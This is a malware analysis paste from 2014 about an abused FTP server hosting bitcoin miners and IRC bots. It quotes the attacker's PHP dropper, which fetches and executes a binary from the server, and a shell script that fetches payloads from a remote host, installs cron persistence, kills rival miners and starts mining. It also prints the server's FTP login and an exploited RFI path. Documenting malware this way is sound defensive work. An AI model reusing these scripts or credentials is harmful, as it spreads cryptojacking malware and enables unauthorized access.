SHARE
TWEET

Case #8 - Journey to Abused FTP

MalwareMustDie Jun 4th, 2014 389 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustdie - Case #8
  2. // Report base: Jorney to hacked FTP sites, url:
  3. // http://blog.malwaremustdie.org/2014/05/a-journey-to-abused-ftp-sites-story-of.html
  4. // http://blog.malwaremustdie.org/2014/06/a-journey-to-abused-ftp-sites-story-of.html
  5. // Samples: http://www.mediafire.com/download/agkazxpg4ie3eqg/Case8-PErl-miners.7z
  6.  
  7. $ curl ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/^
  8. -rwxr-xr-x   1 root     root          872 May 20 00:55 a
  9. -rw-r--r--   1 root     root         1008 May 20 00:56 bot
  10. -rw-r--r--   1 padlezardftp psacln      15138 Apr 16 12:33 botphp
  11. -rwxr-xr-x   1 root     root          283 May  2 04:25 c
  12. -rwxr-xr-x   1 root     root       379680 Dec  3  2013 clamav
  13. -rw-r--r--   1 padlezardftp psacln     753161 Feb 27 07:19 iexplorer.exe
  14. -rw-r--r--   1 padlezardftp psacln     671836 Mar 19 10:35 init.exe
  15. -rwxr-xr-x   1 root     root        15700 Mar 12 05:33 lol
  16. -rw-r--r--   1 padlezardftp psacln     751993 Apr 24 12:26 ovi.exe
  17. -rw-r--r--   1 root     root        26585 Jun  1 19:56 php
  18. -rw-r--r--   1 root     root        15713 Apr 30 01:34 plm
  19. -rw-r--r--   1 root     root        26548 Jun  1 10:16 s0nia
  20. -rwxr-xr-x   1 root     root       518288 Dec  3  2013 sh
  21. -rwxr-xr-x   1 root     root          283 May  2 04:25 update
  22. -rwxr-xr-x   1 root     root       319292 Sep 30  2013 upx
  23.  
  24. // check ELF:
  25.  
  26. $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep ELF
  27. clamav: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x11473c67e3bd026f1c3ce7458b836b15498365c4, stripped
  28. sh:     ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xb7880c540a3530b2831b1618512b5f90269151b8, stripped
  29. upx:    ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
  30. $
  31.  
  32. // Check PE:
  33.  
  34. $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep PE
  35. iexplorer.exe: PE32 executable (GUI) Intel 80386, for MS Windows
  36. init.exe:      PE32 executable (GUI) Intel 80386, for MS Windows
  37. ovi.exe:       PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
  38. $
  39.  
  40. // Check PHP:
  41.  
  42. $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep PHP
  43. bot:           PHP script, ASCII text
  44. $
  45.  
  46. // Check Perl Script:
  47.  
  48. $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep Perl
  49. lol:           Perl script, ASCII text executable
  50. plm:           Perl script, ASCII text executable
  51. $
  52.  
  53. // Check other formats:
  54.  
  55. $ myrfile ^ftp://padlezardftp:123456@84.246.227.121/httpdocs/*^|grep  -v ^ELF\|PE\|PHP\|Perl^
  56.  a:             POSIX shell script, ASCII text executable
  57. botphp:        C++ source, ASCII text
  58. c:             POSIX shell script, ASCII text executable
  59. php:           data
  60. s0nia:         data
  61.  update:        POSIX shell script, ASCII text executable
  62. $
  63.  
  64. // The ELFs:
  65.  
  66. // upx - real one..
  67.  
  68. .rodata:0x080C6680 0x0042  unsigned int upx_adler32(const void*, unsigned int, unsigned int)  
  69. .rodata:0x080C66E0 0x00A5  int upx_compress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, upx_callback_t*, int, int, const upx_compress_config_t*, upx_compress_result_t*)    
  70. .rodata:0x080C67A0 0x0079  int upx_decompress(const unsigned char*, unsigned int, unsigned char*, unsigned int*, int, const upx_compress_result_t*)
  71. .rodata:0x080C6820 0x008F  int upx_test_overlap(const unsigned char*, const unsigned char*, unsigned int, unsigned int, unsigned int*, int, const upx_compress_result_t*)
  72. .rodata:0x080C9371 0x00AA     Ultimate Packer for eXecutables\n      Copyright (C) 1996 - %s\nUPX %-10s  Markus Oberhumer, Laszlo Molnar & John Reiser  %14s\n\n      
  73. .rodata:0x080C941B 0x0039  Usage: %s [-123456789dlthVL] [-qvfk] [-o file] %sfile..\n
  74. .rodata:0x080C947B 0x000C  \nCommands:\n    
  75. .rodata:0x080C9491 0x0034    --best compress best (can be slow for big files)\n      
  76.  
  77. // clamav - actually is a ^minerd^ - bitcoin mining ELF
  78.  
  79. .rodata:0x08096848 0x002B  Try `minerd --help^ for more information.\n
  80. .rodata:0x08096874 0x06A9  Usage: minerd [OPTIONS]\nOptions:\n  -a, --algo=ALGO       specify the algorithm to use\n                          scrypt    scrypt(1024, 1, 1) (default)\n                          sha256d   SHA-256d\n  -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)\n  -O, --userpass=U:P    username:password pair for mining server\n  -u, --user=USERNAME   username for mining server\n  -p, --pass=PASSWORD   password for mining server\n      --cert=FILE       certificate for mining server using SSL\n  -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy\n  -t, --threads=N       number of miner threads (default: number of processors)\n  -r, --retries=N       number of times to retry if a network call fails\n                          (default: retry indefinitely)\n  
  81.                             -R, --retry-pause=N   time to pause between retries, in seconds (default: 0)\n  -T, --timeout=N       network timeout, in seconds (default: 270)\n  -s, --scantime=N      upper bound on time spent s
  82. .rodata:0x08096F20 0x002A  accepted: %lu/%lu (%.2f%%), %s khash/s %s  
  83. .rodata:0x08096F4C 0x002D  DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x                                                                                        
  84. .rodata:0x08096F7C 0x001F  Stratum connection interrupted            
  85. .rodata:0x08096F9C 0x002E  {\^method\^: \^getwork\^, \^params\^: [], \^id\^:0}\r\n                                                                            
  86. .rodata:0x08096FCC 0x0027  DEBUG: stale work detected, discarding    
  87. .rodata:0x08096FF4 0x004E  {\^method\^: \^mining.submit\^, \^params\^: [\^%s\^, \^%s\^, \^%s\^, \^%s\^, \^%s\^], \^id\^:4}                                    
  88. .rodata:0x08097044 0x002E  submit_upstream_work stratum_send_line failed                                                                                      
  89. .rodata:0x08097074 0x0034  {\^method\^: \^getwork\^, \^params\^: [ \^%s\^ ], \^id\^:1}\r\n                                                                    
  90. .rodata:0x080970A8 0x002A  submit_upstream_work json_rpc_call failed  
  91.  
  92. // sh - is also a ^minerd^, below is different ^better^ vector to string the bins:
  93.  
  94. .rodata:0x06C318  Usage: minerd [OPTIONS]
  95. .rodata:0x06C330  Options:
  96. .rodata:0x06C339    -a, --algo=ALGO       specify the algorithm to use
  97. .rodata:0x06C36E                            scrypt    scrypt(1024, 1, 1) (default)
  98. .rodata:0x06C3AF                            sha256d   SHA-256d
  99. .rodata:0x06C3DC    -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
  100. .rodata:0x06C42B    -O, --userpass=U:P    username:password pair for mining server
  101. .rodata:0x06C46C    -u, --user=USERNAME   username for mining server
  102. .rodata:0x06C49F    -p, --pass=PASSWORD   password for mining server
  103. .rodata:0x06C4D2        --cert=FILE       certificate for mining server using SSL
  104. .rodata:0x06C512    -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
  105. .rodata:0x06C552    -t, --threads=N       number of miner threads (default: number of processors)
  106. .rodata:0x06C5A2    -r, --retries=N       number of times to retry if a network call fails
  107. .rodata:0x06C5EB                            (default: retry indefinitely)
  108. .rodata:0x06C623    -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
  109. .rodata:0x06C673    -T, --timeout=N       network timeout, in seconds (default: 270)
  110. .rodata:0x06C6B6    -s, --scantime=N      upper bound on time spent scanning current work when
  111. .rodata:0x06C703                            long polling is unavailable, in seconds (default: 5)
  112. .rodata:0x06C752        --no-longpoll     disable X-Long-Polling support
  113. .rodata:0x06C789        --no-stratum      disable X-Stratum support
  114. .rodata:0x06C7BB    -q, --quiet           disable per-thread hashmeter output
  115. .rodata:0x06C7F7    -D, --debug           enable debug output
  116. .rodata:0x06C823    -P, --protocol-dump   verbose dump of protocol-level activities
  117. .rodata:0x06C865    -S, --syslog          use system log for output messages
  118. .rodata:0x06C8A0    -B, --background      run the miner in the background
  119. .rodata:0x06C8D8        --benchmark       run in offline benchmark mode
  120. .rodata:0x06C90E    -c, --config=FILE     load a JSON-format configuration file
  121. .rodata:0x06C94C    -V, --version         display version information and exit
  122. .rodata:0x06C989    -h, --help            display this help text and exit
  123. .rodata:0x06C9C8  accepted: %lu/%lu (%.2f%%), %s khash/s %s
  124. .rodata:0x06C9F8  DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
  125. .rodata:0x06CA28  Stratum connection interrupted
  126. .rodata:0x06CA48  {^method^: ^getwork^, ^params^: [], ^id^:0}
  127. .rodata:0x06CA78  DEBUG: stale work detected, discarding
  128. .rodata:0x06CAA0  {^method^: ^mining.submit^, ^params^: [^%s^, ^%s^, ^%s^, ^%s^, ^%s^], ^id^:4}
  129. .rodata:0x06CAF0  submit_upstream_work stratum_send_line failed
  130. .rodata:0x06CB20  {^method^: ^getwork^, ^params^: [ ^%s^ ], ^id^:1}
  131.  
  132. // The PE are bitcoin Miner..
  133.  
  134. https://www.virustotal.com/en/file/a343e06a05b863730ec07bbe02c8f3989669afd588603ecca64a73f2db6ed777/analysis/1397692298/
  135. https://www.virustotal.com/en/file/2c5146d815d387fd214a9fbdf5e95885f31512744be4b74b57cac8958e062d07/analysis/1400526645/
  136. https://www.virustotal.com/en/file/eb952920fb9104de08f661a47d76dc7ad5806fc90b2f3a1579da288bdc08066f/analysis/1401094548/
  137.  
  138. // THE PHP is the script to infect OTHER hosts with init.exe
  139.  
  140. <?php
  141. $win_local_file = ^c:\windows\init.exe^;
  142. $lin_local_file = ^/tmp/a^;
  143. $win_server_file = ^/httpdocs/init.exe^;
  144. $lin_server_file = ^/httpdocs/a^;
  145. $ftp_server = ^84.246.227.121^;
  146. $ftp_user_name = ^padlezardftp^;
  147. $ftp_user_pass = ^123456^;
  148. $result = exec(^sh /tmp/a^);
  149.  
  150. echo php_uname();
  151. echo PHP_OS;
  152.  
  153. if (strtoupper(substr(PHP_OS, 0, 3)) === ^WIN^) {
  154.   $conn_id = ftp_connect($ftp_server);
  155.   $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  156.   if (ftp_get($conn_id, $win_local_file, $win_server_file, FTP_BINARY)) {
  157.     echo ^Successfully written to $local_file\n^;
  158.     echo exec(^c:\windows\init.exe &del c:\windows\init.exe^);
  159. } else {
  160.     echo ^There was a problem\n^;
  161. }
  162. ftp_close($conn_id);
  163.  
  164. } else {
  165.   $conn_id = ftp_connect($ftp_server);
  166.   $login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
  167.   if (ftp_get($conn_id, $lin_local_file, $lin_server_file, FTP_BINARY)) {
  168.         echo ^$result^;
  169. } else {
  170.     echo ^There was a problem\n^;
  171. }
  172. ftp_close($conn_id);
  173. }
  174. ?>
  175.  
  176. // THE PERLs...
  177.  
  178. The ^lol^ and ^pLm^ contains the same code.
  179. Is an IRC PerlBot used to spread the infection for these miners.
  180. It has the Webapp vuln scanning, standard flood (TCP & UDP) and
  181. Basic HTTP DoS Flood function. Remoted by IRC or Shell.
  182. The code is here: http://pastebin.com/VQVzw7f9
  183.  
  184. This perl bot is aiming this RFI. Found one, exploit it, then use the PHP script above
  185. to download the shits to new infect host.
  186.  
  187. Vulnerable aimed is hinted by the bot scan
  188. query=^/SQuery/lib/gore.php?libpath=^
  189. Reference: http://www.exploit-db.com/exploits/2003/
  190. More ref: https://www.google.com/search?q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D&ie=utf-8&oe=utf-8&client=ubuntu&channel=fs&gws_rd=ssl#channel=fs&nfpr=1&q=%2FSQuery%2Flib%2Fgore.php%3Flibpath%3D …
  191.  
  192. // The way the attacker executed these files in this FTP is well described
  193. // in file ^a^:
  194.  
  195. #!/bin/sh
  196. crontab -r
  197. cd /tmp
  198. rm -rf a* c* update*
  199. pwd > mech.dir
  200. dir=$(cat mech.dir)
  201. echo ^* * * * * $dir/update >/dev/null 2>&1^ > cron.d
  202. crontab cron.d
  203. crontab -l | grep update
  204. wget http://padlezard.com/update >> /dev/null &&
  205. curl -O http://padlezard.com/update >> /dev/null &&
  206. chmod u+x update
  207. #chattr -ia bash
  208. #chattr -ia *
  209. curl -O http://padlezard.com/clamav
  210. curl -O http://padlezard.com/sh
  211. wget http://padlezard.com/clamav
  212. wget http://padlezard.com/sh
  213. wget http://padlezard.com/plm
  214. curl -O http://padlezard.com/plm
  215. perl plm
  216. rm -rf plm*
  217. chmod +x sh
  218. chmod +x clamav
  219. mv clamav bash
  220. #kill -9 `ps x|grep miner|grep -v grep|awk ^{print $1}^`
  221. kill -9 `ps x|grep stratum|grep -v grep|awk ^{print $1}^`
  222. killall -9 kav m32 m64
  223. ./bash -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
  224. ./sh -o stratum+tcp://176.31.255.138:3333 -O geox.1:x -B
  225. #chattr +ia bash
  226. #chattr +ia sh
  227.  
  228. // Obviously via ^update^ that called GET HTTP in a compromised site
  229. // a (and ^c^) download request was sent to get this ^a^(and ^c^)  to get the miners
  230. // and kicking the Perl bot scanner:
  231.  
  232. #!/bin/sh
  233. plm=`ps x|grep 176.31.255.138:3333|grep -v grep|awk ^{print $7}^`
  234. if [ ^$plm^ != ^^ ]
  235.         then echo ^MERGE!!!^
  236.                 else
  237.         echo ^Starting!!!^
  238.         wget http://padlezard.com/a && sh a >> /dev/null &
  239.         curl -O http://padlezard.com/a && sh a >> /dev/null &
  240. fi
  241.  
  242. // The CNC of this malicious operation is in 176.31.255.138:3333
  243. // again.. ahilarious famous malware gargabe can..The OVH, France:
  244.  
  245. Req time: Wed Jun  4 22:50:59 JST 2014
  246. UP: 176.31.255.138
  247. Result: ns388807.ovh.net.|16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
  248.  
  249. // There is another PHP pbot code called ^phpbot^
  250. is the older version, of pbot , no DDoS L7 HTTP functions
  251.  
  252. // There are two more Perl^s PowerBot IRC Bot
  253. // in file called ^s0nia^ and ^php^
  254. Functions: Hacked the server important dirs (removal),
  255. UDP DoS, PortScanner, File Downloader, Shell Backdoor(backconnect), IRC attacks,
  256.  
  257. // code for these Perl PowerBot is here:
  258. http://pastebin.com/iJX3xaNF
  259.  
  260. -----
  261. #MalwareMustDie!!!!!!!!!
RAW Paste Data
Top